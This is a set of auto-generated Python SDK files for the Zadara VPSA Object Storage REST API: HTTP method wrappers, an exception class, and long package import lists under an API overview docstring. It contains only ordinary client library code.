raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Zios/rest.py | rest.py |
# flake8: noqa
"""
Zadara VPSA Object Storage REST API
# Overview This document outlines the methods available for administrating your VPSA® Object Storage. The API supports form-encoded, JSON, and XML requests, and can return either JSON or XML responses. ## Usage The majority of the APIs available require authentication which requires an API token to use. You can retrieve this token through the Users section of your VPSA, or through the API using the “Return a user’s access key” API in the Users Section below. ## Authentication Methods The authentication token can be passed either through the access_key parameter inside of the body of the REST API request, or through the X-Access-Key header. Alternately, you can use the username and password parameters for authentication, but we do not recommend this method for anything other than possibly retrieving an API key. By default , all operations are allowed only to VPSA Object Storage admin. Some actions are allowed by an account admin and they will be marked on the action’s header ## Timeouts By default, all operations that don’t complete within five seconds will return a message informing you that the action may take some time to complete. When using the API, this can cause some actions, such as adding drives to storage policy, to be undesirably asynchronous. You can specify your own timeout with the timeout parameter, in seconds, and a timeout value of -1 specifies an infinite timeout. ## Metering API Metering information can be retrieved using the VPSA Object Storage API for the following components: - Accounts - Users - Drives - Virtual Controllers - Load Balancer Groups - Storage Policies Metering information returned by the API is subject to the following constraints: - 10 seconds interval - 1 hour range - 1 minute interval - 1 day range - 1 hour interval - 30 days range Values outside the accepted range will be returned as 0. ## Questions If you have any questions or need support involving the REST API, please contact for assistance. # noqa: E501
OpenAPI spec version: v23.8.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import apis into sdk package
from Zios.api.accounts_api import AccountsApi
from Zios.api.container_replication_api import ContainerReplicationApi
from Zios.api.containers_api import ContainersApi
from Zios.api.drives_api import DrivesApi
from Zios.api.load_balancer_api import LoadBalancerApi
from Zios.api.logs_api import LogsApi
from Zios.api.object_storage_destinations_api import ObjectStorageDestinationsApi
from Zios.api.remote_authentication_api import RemoteAuthenticationApi
from Zios.api.roles_api import RolesApi
from Zios.api.settings_api import SettingsApi
from Zios.api.storage_policies_api import StoragePoliciesApi
from Zios.api.users_api import UsersApi
from Zios.api.virtual_controllers_api import VirtualControllersApi
# import ApiClient
from Zios.api_client import ApiClient
from Zios.configuration import Configuration
# import models into sdk package
from Zios.models.body_add_new_user import BodyAddNewUser
from Zios.models.body_allow_tenant_name_in_object_stroage_url import BodyAllowTenantNameInObjectStroageUrl
from Zios.models.body_capacity_over_time import BodyCapacityOverTime
from Zios.models.body_change_mtu_for_network_interface import BodyChangeMtuForNetworkInterface
from Zios.models.body_change_password import BodyChangePassword
from Zios.models.body_change_region import BodyChangeRegion
from Zios.models.body_change_user_pass_by_code import BodyChangeUserPassByCode
from Zios.models.body_change_user_role import BodyChangeUserRole
from Zios.models.body_create_account import BodyCreateAccount
from Zios.models.body_create_account_requests import BodyCreateAccountRequests
from Zios.models.body_create_container_replication_job import BodyCreateContainerReplicationJob
from Zios.models.body_create_object_storage_destination import BodyCreateObjectStorageDestination
from Zios.models.body_define_custom_dns_servers import BodyDefineCustomDnsServers
from Zios.models.body_delete_account import BodyDeleteAccount
from Zios.models.body_delete_drives_from_policy import BodyDeleteDrivesFromPolicy
from Zios.models.body_delete_object_storage_destination import BodyDeleteObjectStorageDestination
from Zios.models.body_delete_proxy_virtual_controller import BodyDeleteProxyVirtualController
from Zios.models.body_delete_replication_job import BodyDeleteReplicationJob
from Zios.models.body_edit_remote_auth_service_conf import BodyEditRemoteAuthServiceConf
from Zios.models.body_get_access_logs import BodyGetAccessLogs
from Zios.models.body_get_account_requests import BodyGetAccountRequests
from Zios.models.body_get_all_accounts import BodyGetAllAccounts
from Zios.models.body_get_auth_token import BodyGetAuthToken
from Zios.models.body_get_container_replication_job import BodyGetContainerReplicationJob
from Zios.models.body_get_cpu_usege import BodyGetCpuUsege
from Zios.models.body_get_iop_metering_load_balancer_group import BodyGetIopMeteringLoadBalancerGroup
from Zios.models.body_get_latency_metering_load_balancer_group import BodyGetLatencyMeteringLoadBalancerGroup
from Zios.models.body_get_log import BodyGetLog
from Zios.models.body_get_memory_usege import BodyGetMemoryUsege
from Zios.models.body_get_throughput_metering_load_balancer_group import BodyGetThroughputMeteringLoadBalancerGroup
from Zios.models.body_iops import BodyIops
from Zios.models.body_issue_temp_code_to_mail import BodyIssueTempCodeToMail
from Zios.models.body_join_remote_auth_service import BodyJoinRemoteAuthService
from Zios.models.body_latency import BodyLatency
from Zios.models.body_pause_container_replication_job import BodyPauseContainerReplicationJob
from Zios.models.body_reset_token import BodyResetToken
from Zios.models.body_reset_user_s3_keys import BodyResetUserS3Keys
from Zios.models.body_restore_encryption import BodyRestoreEncryption
from Zios.models.body_resume_container_replication_job import BodyResumeContainerReplicationJob
from Zios.models.body_set_account_quota_by_capacity import BodySetAccountQuotaByCapacity
from Zios.models.body_set_account_quota_notification_status import BodySetAccountQuotaNotificationStatus
from Zios.models.body_set_account_rate_limit import BodySetAccountRateLimit
from Zios.models.body_set_api_errors_alerts import BodySetApiErrorsAlerts
from Zios.models.body_set_api_hostname import BodySetApiHostname
from Zios.models.body_set_api_ip import BodySetApiIp
from Zios.models.body_set_billing_currency import BodySetBillingCurrency
from Zios.models.body_set_container_quota_settings import BodySetContainerQuotaSettings
from Zios.models.body_set_containers_virtual_hosted_style_support import BodySetContainersVirtualHostedStyleSupport
from Zios.models.body_set_data_transfer_pricing import BodySetDataTransferPricing
from Zios.models.body_set_encryption import BodySetEncryption
from Zios.models.body_set_global_rate_limit import BodySetGlobalRateLimit
from Zios.models.body_set_gradual_policy_expansion_percentage import BodySetGradualPolicyExpansionPercentage
from Zios.models.body_set_lb_mode import BodySetLbMode
from Zios.models.body_set_public_ip_hostname import BodySetPublicIpHostname
from Zios.models.body_set_quota_alert_status_and_threshold import BodySetQuotaAlertStatusAndThreshold
from Zios.models.body_show_bandwidth_throughput_metering_for_user import BodyShowBandwidthThroughputMeteringForUser
from Zios.models.body_show_bandwidth_throughput_metering_of_account import BodyShowBandwidthThroughputMeteringOfAccount
from Zios.models.body_show_bandwidth_throughput_metering_of_drive import BodyShowBandwidthThroughputMeteringOfDrive
from Zios.models.body_show_bandwidth_throughput_metering_on_vc import BodyShowBandwidthThroughputMeteringOnVc
from Zios.models.body_show_iops_metering_of_account import BodyShowIopsMeteringOfAccount
from Zios.models.body_show_iops_metering_of_drive import BodyShowIopsMeteringOfDrive
from Zios.models.body_show_iops_metring_of_user import BodyShowIopsMetringOfUser
from Zios.models.body_show_iops_metring_of_vc import BodyShowIopsMetringOfVc
from Zios.models.body_show_latency_metering_of_account import BodyShowLatencyMeteringOfAccount
from Zios.models.body_show_latency_metering_of_drive import BodyShowLatencyMeteringOfDrive
from Zios.models.body_show_latency_metering_of_user import BodyShowLatencyMeteringOfUser
from Zios.models.body_show_latency_metering_on_vc import BodyShowLatencyMeteringOnVc
from Zios.models.body_ssl_termination import BodySslTermination
from Zios.models.body_throughput import BodyThroughput
from Zios.models.body_token_expiration import BodyTokenExpiration
from Zios.models.body_updat_object_storage_destination import BodyUpdatObjectStorageDestination
from Zios.models.body_update_storage_policy import BodyUpdateStoragePolicy
from Zios.models.body_upload_ssl_pem import BodyUploadSslPem
from Zios.models.default import Default
from Zios.models.default_response import DefaultResponse
from Zios.models.error import Error
from Zios.models.inline_response200 import InlineResponse200
from Zios.models.inline_response2001 import InlineResponse2001
from Zios.models.inline_response20010 import InlineResponse20010
from Zios.models.inline_response20010_objects import InlineResponse20010Objects
from Zios.models.inline_response20011 import InlineResponse20011
from Zios.models.inline_response20011_objects import InlineResponse20011Objects
from Zios.models.inline_response20012 import InlineResponse20012
from Zios.models.inline_response20012_objects import InlineResponse20012Objects
from Zios.models.inline_response20013 import InlineResponse20013
from Zios.models.inline_response20013_response import InlineResponse20013Response
from Zios.models.inline_response20013_response_quota_enabled_accounts import InlineResponse20013ResponseQuotaEnabledAccounts
from Zios.models.inline_response20014 import InlineResponse20014
from Zios.models.inline_response20014_response import InlineResponse20014Response
from Zios.models.inline_response20015 import InlineResponse20015
from Zios.models.inline_response20015_response import InlineResponse20015Response
from Zios.models.inline_response20015_response_replication_jobs import InlineResponse20015ResponseReplicationJobs
from Zios.models.inline_response20016 import InlineResponse20016
from Zios.models.inline_response20016_response import InlineResponse20016Response
from Zios.models.inline_response20016_response_replication_jobs import InlineResponse20016ResponseReplicationJobs
from Zios.models.inline_response20017 import InlineResponse20017
from Zios.models.inline_response20017_response import InlineResponse20017Response
from Zios.models.inline_response20017_response_replication_jobs import InlineResponse20017ResponseReplicationJobs
from Zios.models.inline_response20018 import InlineResponse20018
from Zios.models.inline_response20018_response import InlineResponse20018Response
from Zios.models.inline_response20019 import InlineResponse20019
from Zios.models.inline_response20019_response import InlineResponse20019Response
from Zios.models.inline_response20019_response_disks import InlineResponse20019ResponseDisks
from Zios.models.inline_response2001_response import InlineResponse2001Response
from Zios.models.inline_response2002 import InlineResponse2002
from Zios.models.inline_response20020 import InlineResponse20020
from Zios.models.inline_response20020_response import InlineResponse20020Response
from Zios.models.inline_response20020_response_disk import InlineResponse20020ResponseDisk
from Zios.models.inline_response20021 import InlineResponse20021
from Zios.models.inline_response20021_response import InlineResponse20021Response
from Zios.models.inline_response20021_response_lbgs import InlineResponse20021ResponseLbgs
from Zios.models.inline_response20022 import InlineResponse20022
from Zios.models.inline_response20022_response import InlineResponse20022Response
from Zios.models.inline_response20023 import InlineResponse20023
from Zios.models.inline_response20023_response import InlineResponse20023Response
from Zios.models.inline_response20023_response_messages import InlineResponse20023ResponseMessages
from Zios.models.inline_response20024 import InlineResponse20024
from Zios.models.inline_response20024_response import InlineResponse20024Response
from Zios.models.inline_response20024_response_access_logs import InlineResponse20024ResponseAccessLogs
from Zios.models.inline_response20025 import InlineResponse20025
from Zios.models.inline_response20025_response import InlineResponse20025Response
from Zios.models.inline_response20025_response_container_replication_targets import InlineResponse20025ResponseContainerReplicationTargets
from Zios.models.inline_response20026 import InlineResponse20026
from Zios.models.inline_response20026_response import InlineResponse20026Response
from Zios.models.inline_response20027 import InlineResponse20027
from Zios.models.inline_response20027_response import InlineResponse20027Response
from Zios.models.inline_response20028 import InlineResponse20028
from Zios.models.inline_response20028_response import InlineResponse20028Response
from Zios.models.inline_response20028_response_roles import InlineResponse20028ResponseRoles
from Zios.models.inline_response20029 import InlineResponse20029
from Zios.models.inline_response20029_response import InlineResponse20029Response
from Zios.models.inline_response2002_response import InlineResponse2002Response
from Zios.models.inline_response2002_response_account import InlineResponse2002ResponseAccount
from Zios.models.inline_response2003 import InlineResponse2003
from Zios.models.inline_response20030 import InlineResponse20030
from Zios.models.inline_response20030_response import InlineResponse20030Response
from Zios.models.inline_response20030_response_quota_notif_configs import InlineResponse20030ResponseQuotaNotifConfigs
from Zios.models.inline_response20031 import InlineResponse20031
from Zios.models.inline_response20031_response import InlineResponse20031Response
from Zios.models.inline_response20031_response_policies import InlineResponse20031ResponsePolicies
from Zios.models.inline_response20032 import InlineResponse20032
from Zios.models.inline_response20032_response import InlineResponse20032Response
from Zios.models.inline_response20032_response_policy import InlineResponse20032ResponsePolicy
from Zios.models.inline_response20033 import InlineResponse20033
from Zios.models.inline_response20033_response import InlineResponse20033Response
from Zios.models.inline_response20034 import InlineResponse20034
from Zios.models.inline_response20034_objects import InlineResponse20034Objects
from Zios.models.inline_response20035 import InlineResponse20035
from Zios.models.inline_response20035_response import InlineResponse20035Response
from Zios.models.inline_response20035_response_roles import InlineResponse20035ResponseRoles
from Zios.models.inline_response20035_response_users import InlineResponse20035ResponseUsers
from Zios.models.inline_response20035_response_zios_data import InlineResponse20035ResponseZiosData
from Zios.models.inline_response20035_response_zios_data_zios_user import InlineResponse20035ResponseZiosDataZiosUser
from Zios.models.inline_response20035_response_zios_data_zios_user_roles import InlineResponse20035ResponseZiosDataZiosUserRoles
from Zios.models.inline_response20036 import InlineResponse20036
from Zios.models.inline_response20036_response import InlineResponse20036Response
from Zios.models.inline_response20037 import InlineResponse20037
from Zios.models.inline_response20037_response import InlineResponse20037Response
from Zios.models.inline_response20037_response_user import InlineResponse20037ResponseUser
from Zios.models.inline_response20038 import InlineResponse20038
from Zios.models.inline_response20038_response import InlineResponse20038Response
from Zios.models.inline_response20038_response_user import InlineResponse20038ResponseUser
from Zios.models.inline_response20038_response_user_zios_data import InlineResponse20038ResponseUserZiosData
from Zios.models.inline_response20038_response_user_zios_data_zios_user import InlineResponse20038ResponseUserZiosDataZiosUser
from Zios.models.inline_response20039 import InlineResponse20039
from Zios.models.inline_response20039_response import InlineResponse20039Response
from Zios.models.inline_response2003_response import InlineResponse2003Response
from Zios.models.inline_response2004 import InlineResponse2004
from Zios.models.inline_response20040 import InlineResponse20040
from Zios.models.inline_response20040_response import InlineResponse20040Response
from Zios.models.inline_response20041 import InlineResponse20041
from Zios.models.inline_response20041_response import InlineResponse20041Response
from Zios.models.inline_response20042 import InlineResponse20042
from Zios.models.inline_response20042_response import InlineResponse20042Response
from Zios.models.inline_response20042_response_credentials import InlineResponse20042ResponseCredentials
from Zios.models.inline_response20043 import InlineResponse20043
from Zios.models.inline_response20043_response import InlineResponse20043Response
from Zios.models.inline_response20043_response_user import InlineResponse20043ResponseUser
from Zios.models.inline_response20043_response_user_roles import InlineResponse20043ResponseUserRoles
from Zios.models.inline_response20043_response_user_zios_data import InlineResponse20043ResponseUserZiosData
from Zios.models.inline_response20043_response_user_zios_data_zios_user import InlineResponse20043ResponseUserZiosDataZiosUser
from Zios.models.inline_response20043_response_user_zios_data_zios_user_roles import InlineResponse20043ResponseUserZiosDataZiosUserRoles
from Zios.models.inline_response20044 import InlineResponse20044
from Zios.models.inline_response20045 import InlineResponse20045
from Zios.models.inline_response20046 import InlineResponse20046
from Zios.models.inline_response20046_response import InlineResponse20046Response
from Zios.models.inline_response20046_response_vcs import InlineResponse20046ResponseVcs
from Zios.models.inline_response20047 import InlineResponse20047
from Zios.models.inline_response20047_response import InlineResponse20047Response
from Zios.models.inline_response20047_response_vc import InlineResponse20047ResponseVc
from Zios.models.inline_response20048 import InlineResponse20048
from Zios.models.inline_response20048_response import InlineResponse20048Response
from Zios.models.inline_response20048_response_disks import InlineResponse20048ResponseDisks
from Zios.models.inline_response20049 import InlineResponse20049
from Zios.models.inline_response20049_objects import InlineResponse20049Objects
from Zios.models.inline_response2004_response import InlineResponse2004Response
from Zios.models.inline_response2004_response_users import InlineResponse2004ResponseUsers
from Zios.models.inline_response2005 import InlineResponse2005
from Zios.models.inline_response20050 import InlineResponse20050
from Zios.models.inline_response20050_objects import InlineResponse20050Objects
from Zios.models.inline_response2005_response import InlineResponse2005Response
from Zios.models.inline_response2006 import InlineResponse2006
from Zios.models.inline_response2006_response import InlineResponse2006Response
from Zios.models.inline_response2006_response_arguments import InlineResponse2006ResponseArguments
from Zios.models.inline_response2006_response_decided_by import InlineResponse2006ResponseDecidedBy
from Zios.models.inline_response2006_response_requests import InlineResponse2006ResponseRequests
from Zios.models.inline_response2007 import InlineResponse2007
from Zios.models.inline_response2007_response import InlineResponse2007Response
from Zios.models.inline_response2008 import InlineResponse2008
from Zios.models.inline_response2008_response import InlineResponse2008Response
from Zios.models.inline_response2009 import InlineResponse2009
from Zios.models.inline_response2009_response import InlineResponse2009Response
from Zios.models.inline_response200_response import InlineResponse200Response
from Zios.models.inline_response200_response_accounts import InlineResponse200ResponseAccounts | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Zios/__init__.py | __init__.py |
# flake8: noqa
"""
Zadara VPSA Object Storage REST API
# Overview This document outlines the methods available for administrating your VPSA® Object Storage. The API supports form-encoded, JSON, and XML requests, and can return either JSON or XML responses. ## Usage The majority of the APIs available require authentication which requires an API token to use. You can retrieve this token through the Users section of your VPSA, or through the API using the “Return a user’s access key” API in the Users Section below. ## Authentication Methods The authentication token can be passed either through the access_key parameter inside of the body of the REST API request, or through the X-Access-Key header. Alternately, you can use the username and password parameters for authentication, but we do not recommend this method for anything other than possibly retrieving an API key. By default , all operations are allowed only to VPSA Object Storage admin. Some actions are allowed by an account admin and they will be marked on the action’s header ## Timeouts By default, all operations that don’t complete within five seconds will return a message informing you that the action may take some time to complete. When using the API, this can cause some actions, such as adding drives to storage policy, to be undesirably asynchronous. You can specify your own timeout with the timeout parameter, in seconds, and a timeout value of -1 specifies an infinite timeout. ## Metering API Metering information can be retrieved using the VPSA Object Storage API for the following components: - Accounts - Users - Drives - Virtual Controllers - Load Balancer Groups - Storage Policies Metering information returned by the API is subject to the following constraints: - 10 seconds interval - 1 hour range - 1 minute interval - 1 day range - 1 hour interval - 30 days range Values outside the accepted range will be returned as 0. ## Questions If you have any questions or need support involving the REST API, please contact for assistance. # noqa: E501
OpenAPI spec version: v23.8.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from Zios.models.body_add_new_user import BodyAddNewUser
from Zios.models.body_allow_tenant_name_in_object_stroage_url import BodyAllowTenantNameInObjectStroageUrl
from Zios.models.body_capacity_over_time import BodyCapacityOverTime
from Zios.models.body_change_mtu_for_network_interface import BodyChangeMtuForNetworkInterface
from Zios.models.body_change_password import BodyChangePassword
from Zios.models.body_change_region import BodyChangeRegion
from Zios.models.body_change_user_pass_by_code import BodyChangeUserPassByCode
from Zios.models.body_change_user_role import BodyChangeUserRole
from Zios.models.body_create_account import BodyCreateAccount
from Zios.models.body_create_account_requests import BodyCreateAccountRequests
from Zios.models.body_create_container_replication_job import BodyCreateContainerReplicationJob
from Zios.models.body_create_object_storage_destination import BodyCreateObjectStorageDestination
from Zios.models.body_define_custom_dns_servers import BodyDefineCustomDnsServers
from Zios.models.body_delete_account import BodyDeleteAccount
from Zios.models.body_delete_drives_from_policy import BodyDeleteDrivesFromPolicy
from Zios.models.body_delete_object_storage_destination import BodyDeleteObjectStorageDestination
from Zios.models.body_delete_proxy_virtual_controller import BodyDeleteProxyVirtualController
from Zios.models.body_delete_replication_job import BodyDeleteReplicationJob
from Zios.models.body_edit_remote_auth_service_conf import BodyEditRemoteAuthServiceConf
from Zios.models.body_get_access_logs import BodyGetAccessLogs
from Zios.models.body_get_account_requests import BodyGetAccountRequests
from Zios.models.body_get_all_accounts import BodyGetAllAccounts
from Zios.models.body_get_auth_token import BodyGetAuthToken
from Zios.models.body_get_container_replication_job import BodyGetContainerReplicationJob
from Zios.models.body_get_cpu_usege import BodyGetCpuUsege
from Zios.models.body_get_iop_metering_load_balancer_group import BodyGetIopMeteringLoadBalancerGroup
from Zios.models.body_get_latency_metering_load_balancer_group import BodyGetLatencyMeteringLoadBalancerGroup
from Zios.models.body_get_log import BodyGetLog
from Zios.models.body_get_memory_usege import BodyGetMemoryUsege
from Zios.models.body_get_throughput_metering_load_balancer_group import BodyGetThroughputMeteringLoadBalancerGroup
from Zios.models.body_iops import BodyIops
from Zios.models.body_issue_temp_code_to_mail import BodyIssueTempCodeToMail
from Zios.models.body_join_remote_auth_service import BodyJoinRemoteAuthService
from Zios.models.body_latency import BodyLatency
from Zios.models.body_pause_container_replication_job import BodyPauseContainerReplicationJob
from Zios.models.body_reset_token import BodyResetToken
from Zios.models.body_reset_user_s3_keys import BodyResetUserS3Keys
from Zios.models.body_restore_encryption import BodyRestoreEncryption
from Zios.models.body_resume_container_replication_job import BodyResumeContainerReplicationJob
from Zios.models.body_set_account_quota_by_capacity import BodySetAccountQuotaByCapacity
from Zios.models.body_set_account_quota_notification_status import BodySetAccountQuotaNotificationStatus
from Zios.models.body_set_account_rate_limit import BodySetAccountRateLimit
from Zios.models.body_set_api_errors_alerts import BodySetApiErrorsAlerts
from Zios.models.body_set_api_hostname import BodySetApiHostname
from Zios.models.body_set_api_ip import BodySetApiIp
from Zios.models.body_set_billing_currency import BodySetBillingCurrency
from Zios.models.body_set_container_quota_settings import BodySetContainerQuotaSettings
from Zios.models.body_set_containers_virtual_hosted_style_support import BodySetContainersVirtualHostedStyleSupport
from Zios.models.body_set_data_transfer_pricing import BodySetDataTransferPricing
from Zios.models.body_set_encryption import BodySetEncryption
from Zios.models.body_set_global_rate_limit import BodySetGlobalRateLimit
from Zios.models.body_set_gradual_policy_expansion_percentage import BodySetGradualPolicyExpansionPercentage
from Zios.models.body_set_lb_mode import BodySetLbMode
from Zios.models.body_set_public_ip_hostname import BodySetPublicIpHostname
from Zios.models.body_set_quota_alert_status_and_threshold import BodySetQuotaAlertStatusAndThreshold
from Zios.models.body_show_bandwidth_throughput_metering_for_user import BodyShowBandwidthThroughputMeteringForUser
from Zios.models.body_show_bandwidth_throughput_metering_of_account import BodyShowBandwidthThroughputMeteringOfAccount
from Zios.models.body_show_bandwidth_throughput_metering_of_drive import BodyShowBandwidthThroughputMeteringOfDrive
from Zios.models.body_show_bandwidth_throughput_metering_on_vc import BodyShowBandwidthThroughputMeteringOnVc
from Zios.models.body_show_iops_metering_of_account import BodyShowIopsMeteringOfAccount
from Zios.models.body_show_iops_metering_of_drive import BodyShowIopsMeteringOfDrive
from Zios.models.body_show_iops_metring_of_user import BodyShowIopsMetringOfUser
from Zios.models.body_show_iops_metring_of_vc import BodyShowIopsMetringOfVc
from Zios.models.body_show_latency_metering_of_account import BodyShowLatencyMeteringOfAccount
from Zios.models.body_show_latency_metering_of_drive import BodyShowLatencyMeteringOfDrive
from Zios.models.body_show_latency_metering_of_user import BodyShowLatencyMeteringOfUser
from Zios.models.body_show_latency_metering_on_vc import BodyShowLatencyMeteringOnVc
from Zios.models.body_ssl_termination import BodySslTermination
from Zios.models.body_throughput import BodyThroughput
from Zios.models.body_token_expiration import BodyTokenExpiration
from Zios.models.body_updat_object_storage_destination import BodyUpdatObjectStorageDestination
from Zios.models.body_update_storage_policy import BodyUpdateStoragePolicy
from Zios.models.body_upload_ssl_pem import BodyUploadSslPem
from Zios.models.default import Default
from Zios.models.default_response import DefaultResponse
from Zios.models.error import Error
from Zios.models.inline_response200 import InlineResponse200
from Zios.models.inline_response2001 import InlineResponse2001
from Zios.models.inline_response20010 import InlineResponse20010
from Zios.models.inline_response20010_objects import InlineResponse20010Objects
from Zios.models.inline_response20011 import InlineResponse20011
from Zios.models.inline_response20011_objects import InlineResponse20011Objects
from Zios.models.inline_response20012 import InlineResponse20012
from Zios.models.inline_response20012_objects import InlineResponse20012Objects
from Zios.models.inline_response20013 import InlineResponse20013
from Zios.models.inline_response20013_response import InlineResponse20013Response
from Zios.models.inline_response20013_response_quota_enabled_accounts import InlineResponse20013ResponseQuotaEnabledAccounts
from Zios.models.inline_response20014 import InlineResponse20014
from Zios.models.inline_response20014_response import InlineResponse20014Response
from Zios.models.inline_response20015 import InlineResponse20015
from Zios.models.inline_response20015_response import InlineResponse20015Response
from Zios.models.inline_response20015_response_replication_jobs import InlineResponse20015ResponseReplicationJobs
from Zios.models.inline_response20016 import InlineResponse20016
from Zios.models.inline_response20016_response import InlineResponse20016Response
from Zios.models.inline_response20016_response_replication_jobs import InlineResponse20016ResponseReplicationJobs
from Zios.models.inline_response20017 import InlineResponse20017
from Zios.models.inline_response20017_response import InlineResponse20017Response
from Zios.models.inline_response20017_response_replication_jobs import InlineResponse20017ResponseReplicationJobs
from Zios.models.inline_response20018 import InlineResponse20018
from Zios.models.inline_response20018_response import InlineResponse20018Response
from Zios.models.inline_response20019 import InlineResponse20019
from Zios.models.inline_response20019_response import InlineResponse20019Response
from Zios.models.inline_response20019_response_disks import InlineResponse20019ResponseDisks
from Zios.models.inline_response2001_response import InlineResponse2001Response
from Zios.models.inline_response2002 import InlineResponse2002
from Zios.models.inline_response20020 import InlineResponse20020
from Zios.models.inline_response20020_response import InlineResponse20020Response
from Zios.models.inline_response20020_response_disk import InlineResponse20020ResponseDisk
from Zios.models.inline_response20021 import InlineResponse20021
from Zios.models.inline_response20021_response import InlineResponse20021Response
from Zios.models.inline_response20021_response_lbgs import InlineResponse20021ResponseLbgs
from Zios.models.inline_response20022 import InlineResponse20022
from Zios.models.inline_response20022_response import InlineResponse20022Response
from Zios.models.inline_response20023 import InlineResponse20023
from Zios.models.inline_response20023_response import InlineResponse20023Response
from Zios.models.inline_response20023_response_messages import InlineResponse20023ResponseMessages
from Zios.models.inline_response20024 import InlineResponse20024
from Zios.models.inline_response20024_response import InlineResponse20024Response
from Zios.models.inline_response20024_response_access_logs import InlineResponse20024ResponseAccessLogs
from Zios.models.inline_response20025 import InlineResponse20025
from Zios.models.inline_response20025_response import InlineResponse20025Response
from Zios.models.inline_response20025_response_container_replication_targets import InlineResponse20025ResponseContainerReplicationTargets
from Zios.models.inline_response20026 import InlineResponse20026
from Zios.models.inline_response20026_response import InlineResponse20026Response
from Zios.models.inline_response20027 import InlineResponse20027
from Zios.models.inline_response20027_response import InlineResponse20027Response
from Zios.models.inline_response20028 import InlineResponse20028
from Zios.models.inline_response20028_response import InlineResponse20028Response
from Zios.models.inline_response20028_response_roles import InlineResponse20028ResponseRoles
from Zios.models.inline_response20029 import InlineResponse20029
from Zios.models.inline_response20029_response import InlineResponse20029Response
from Zios.models.inline_response2002_response import InlineResponse2002Response
from Zios.models.inline_response2002_response_account import InlineResponse2002ResponseAccount
from Zios.models.inline_response2003 import InlineResponse2003
from Zios.models.inline_response20030 import InlineResponse20030
from Zios.models.inline_response20030_response import InlineResponse20030Response
from Zios.models.inline_response20030_response_quota_notif_configs import InlineResponse20030ResponseQuotaNotifConfigs
from Zios.models.inline_response20031 import InlineResponse20031
from Zios.models.inline_response20031_response import InlineResponse20031Response
from Zios.models.inline_response20031_response_policies import InlineResponse20031ResponsePolicies
from Zios.models.inline_response20032 import InlineResponse20032
from Zios.models.inline_response20032_response import InlineResponse20032Response
from Zios.models.inline_response20032_response_policy import InlineResponse20032ResponsePolicy
from Zios.models.inline_response20033 import InlineResponse20033
from Zios.models.inline_response20033_response import InlineResponse20033Response
from Zios.models.inline_response20034 import InlineResponse20034
from Zios.models.inline_response20034_objects import InlineResponse20034Objects
from Zios.models.inline_response20035 import InlineResponse20035
from Zios.models.inline_response20035_response import InlineResponse20035Response
from Zios.models.inline_response20035_response_roles import InlineResponse20035ResponseRoles
from Zios.models.inline_response20035_response_users import InlineResponse20035ResponseUsers
from Zios.models.inline_response20035_response_zios_data import InlineResponse20035ResponseZiosData
from Zios.models.inline_response20035_response_zios_data_zios_user import InlineResponse20035ResponseZiosDataZiosUser
from Zios.models.inline_response20035_response_zios_data_zios_user_roles import InlineResponse20035ResponseZiosDataZiosUserRoles
from Zios.models.inline_response20036 import InlineResponse20036
from Zios.models.inline_response20036_response import InlineResponse20036Response
from Zios.models.inline_response20037 import InlineResponse20037
from Zios.models.inline_response20037_response import InlineResponse20037Response
from Zios.models.inline_response20037_response_user import InlineResponse20037ResponseUser
from Zios.models.inline_response20038 import InlineResponse20038
from Zios.models.inline_response20038_response import InlineResponse20038Response
from Zios.models.inline_response20038_response_user import InlineResponse20038ResponseUser
from Zios.models.inline_response20038_response_user_zios_data import InlineResponse20038ResponseUserZiosData
from Zios.models.inline_response20038_response_user_zios_data_zios_user import InlineResponse20038ResponseUserZiosDataZiosUser
from Zios.models.inline_response20039 import InlineResponse20039
from Zios.models.inline_response20039_response import InlineResponse20039Response
from Zios.models.inline_response2003_response import InlineResponse2003Response
from Zios.models.inline_response2004 import InlineResponse2004
from Zios.models.inline_response20040 import InlineResponse20040
from Zios.models.inline_response20040_response import InlineResponse20040Response
from Zios.models.inline_response20041 import InlineResponse20041
from Zios.models.inline_response20041_response import InlineResponse20041Response
